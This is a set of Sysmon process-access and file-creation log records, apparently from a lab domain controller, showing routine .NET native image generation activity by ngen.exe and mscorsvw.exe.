{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8004,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.903\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00106D1F0D00}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.903","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00106D1F0D00}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8005,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.903\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00106D1F0D00}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.903","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00106D1F0D00}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8006,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.903\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00106D1F0D00}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.903","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00106D1F0D00}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8007,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:20.966\r\nProcessGuid: {E2A3D6B1-1340-5F25-0000-0010E87F0D00}\r\nProcessId: 2900\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b54-0\\PresentationFramework-SystemXml.dll\r\nCreationUtcTime: 2020-08-01 07:01:20.966","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:20.966","ProcessGuid":"{E2A3D6B1-1340-5F25-0000-0010E87F0D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b54-0\\PresentationFramework-SystemXml.dll","CreationUtcTime":"2020-08-01 07:01:20.966","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8008,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.997\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010A0230D00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.997","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010A0230D00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8009,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.997\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010A0230D00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.997","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010A0230D00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8010,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.997\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010A0230D00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.997","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010A0230D00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8011,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.028\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-001070270D00}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.028","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-001070270D00}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8012,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.028\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-001070270D00}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.028","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-001070270D00}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
